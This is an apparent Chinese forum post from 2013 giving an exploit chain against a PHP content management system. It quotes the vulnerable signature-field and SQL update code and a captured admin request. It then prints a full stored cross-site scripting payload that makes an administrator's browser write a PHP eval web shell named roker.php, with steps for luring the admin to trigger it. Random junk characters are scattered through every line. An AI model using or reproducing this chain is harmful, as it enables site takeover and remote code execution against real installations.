|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
( n0 ^/ y0 d6 W1 p% i/ M官网已经修补了,所以重新下了源码& G) P+ R# o! Z% H K# Z
因为 后台登入 还需要认证码 所以 注入就没看了。
- o. b" F! x0 G: t- D0 u存在 xss
8 C6 h2 X8 s; E& O; r% {漏洞文件 user/member/skin_edit.php$ d1 }( L" G: y
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
, ~/ p* J5 J B5 B* e
9 U$ Z z v7 ?7 ]</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>0 }( S( }/ R' e& M* A8 J
. _2 Z8 P0 C; w6 ^: T. _ \: I6 V</textarea></td></tr>$ \7 s* H4 F% a/ C
% b5 K3 N0 B7 R% }5 `) @ user/do.php
' F0 R% p6 X1 J2 S5 L5 u& G, x4 e& V; D8 c9 T8 }* }/ r
0 G/ ?: w6 Y+ i; c* o9 B% \1 m! \" ~
if($op=='zl'){ //资料 p1 d' J( h5 R+ H$ U- j8 j, T5 O
]1 y! f" q" H3 ]" O; S& k: L
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) $ u' b/ ^. _# o7 d( J
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));$ ^( k; m3 |: f+ D
- F9 j1 ]- R+ K% ]1 i $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',# j3 C, Y" n: V* ^% k* `
* U6 O/ @, V* X$ p, `7 w/ J. ?6 Q CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
. w; E: X. j" k& @, t1 A where CS_Name='".$cscms_name."'";: `! M) V: Y7 h& b" ~0 w
5 M8 x5 A4 Z% u% ?3 P if($db->query($sql)){4 R- ^9 R0 E- t: n+ c) m. X
Y6 x1 z! B1 R exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
! |' n+ K' L" M* _ % H4 _% N4 b% h, A
}else{1 Q$ Z5 Y0 p; |" V) q
( w u% ]' r$ R* Z0 A/ l
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));8 [) X2 @' @, K; `6 u/ `' Z0 q# T" Q
& M8 {; u2 S7 g3 p }
" A: J/ [/ N/ [7 b1 v5 K" `" f$ L0 I" ]; @* Y# h% @' d+ P' B. G
Z9 X, F# S2 ?. B& f# O, ^; S没有 过滤导致xss产生。
; x3 l" @$ M. U& C后台 看了下 很奇葩的是可以写任意格式文件。。
* }/ E( f3 M2 R2 F' Y抓包。。
5 x+ |* @( K- O# i* v5 t
$ E* N) X, s: E3 J; i1 d9 Q% J1 ?4 @& w6 [( @4 W: h$ S7 ~
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.18 q% C& [7 ?+ v+ @; P
* {, B/ Q1 x3 n6 u E2 LAccept: text/html, application/xhtml+xml, */*& {- c7 d0 L, T/ s+ _. L
" z7 |. s5 @. v- A3 _" M$ q
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
5 x/ T& V$ w1 ]6 ?; k 2 b9 Y- e- K# \; m
Accept-Language: zh-CN
/ u' Y5 H& a/ ~$ Q 6 g x% O0 Z- B! `
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)2 N9 I. u, ^) A: |. A
, p/ y3 K+ f" e6 K
Content-Type: application/x-www-form-urlencoded
" |* q8 |5 r2 I7 X3 |' k- z
4 [1 G' }- c$ i# \Accept-Encoding: gzip, deflate3 Y3 @4 X j* V v8 G; B1 Y
6 D/ B& s ~1 f- T; }7 RHost: 127.0.0.1$ s1 Y. O5 u" [, g" u U, Z
8 M8 o7 R1 a6 J0 v' EContent-Length: 38
% T- S! ]4 P# h5 ^( V# P7 B; T 2 t$ x6 Y# Q( Z6 a
DNT: 15 G8 l; E- ^. J6 t Y5 N2 `
5 e4 S1 f) ~- n6 K
Connection: Keep-Alive8 ~9 n- X. V7 S9 W/ X- g
7 u8 @. y4 q6 b7 U3 o7 n8 eCache-Control: no-cache+ j. W& d- z% w$ e1 P
! s: s3 V- d. W: z" j. RCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655948 U R. P7 k% s! I. D
. R# e& a" q/ u6 T! W; h# _
3 M2 D5 p" d% M+ f3 Y* w. g3 J. aname=aaa.php&content=%3Cs%3E%3Ca%25%3E! Q: ]2 K7 E2 b
! @% p7 ]$ q3 H# ]9 \* w: T
) } @6 W) v! { }
' q! H# m) L4 S- Z0 [4 q于是 构造js如下。
5 W; l3 k7 g1 I% N% [) S& ~% q& I
本帖隐藏的内容<script>
7 [! X# h# |2 f1 L0 g' B; ]9 ithisTHost = top.location.hostname;
5 H) a: B6 s+ h/ ? - y' H/ g/ S; I* ^4 F3 s
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";" P( Q! e2 v# c
6 ^) s! @% D1 ?& S) k
function PostSubmit(url, data, msg) {
) V! H8 H9 G" K# b- i# \ var postUrl = url;% {- A) U1 [" X" |$ e$ a
+ t! C& [3 L7 R8 @# b9 O5 @ var postData = data; ) W3 t i9 v* O5 P- D7 p h6 a! Y
var msgData = msg;
( b) f$ [% [* g* U2 C var ExportForm = document.createElement("FORM");
6 J* y! [7 n- ]# {- H' C" M document.body.appendChild(ExportForm);
6 N9 q2 y1 S7 T0 }# C ExportForm.method = "POST"; ]0 f. e$ G% w; `6 }; l2 M# O
var newElement = document.createElement("input");
$ C" O" V% m2 c0 n" ? newElement.setAttribute("name", "name");
H W9 J- ]/ l F4 m newElement.setAttribute("type", "hidden");
6 o X+ Z' j* M. N: i0 M' @ var newElement2 = document.createElement("input"); & G! r" C( B5 N. V) X4 \* }( ]: L ^
newElement2.setAttribute("name", "content"); - A$ X" r4 ^4 _8 M7 |6 j* d
newElement2.setAttribute("type", "hidden");
( c3 D! x. V! {" s ExportForm.appendChild(newElement); ( G& n: c5 ^* I6 y
ExportForm.appendChild(newElement2);
5 J3 ~8 X3 ^3 H: [; Z2 [, P newElement.value = postData;
4 ]3 U# ]! E# X; i9 a- [ newElement2.value = msgData;
z/ g o2 q+ B6 G& I0 u ExportForm.action = postUrl; ! D/ T+ v$ ^2 j0 [. V' M0 p! |# z: F8 h
ExportForm.submit();
5 O/ A N5 ]7 n) c5 m0 J1 b$ A: E};
: V3 U9 l. g! i+ I 6 r2 \. `0 F$ x/ U# b4 g! J7 H
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
: @, h5 y8 t( a; x& A3 ^
3 M: Z q* u' s. }</script>
/ k# ^/ K! t6 I; c2 ]8 t) s5 y2 Q" j9 B# x
9 j6 A( a B: N0 n# Y1 q) V& t! b+ ?: M
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
, h6 _* I3 Z q; R/ I3 X用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)) K" T) [+ A( y
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
6 j, _, A% C- b: }& ]
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对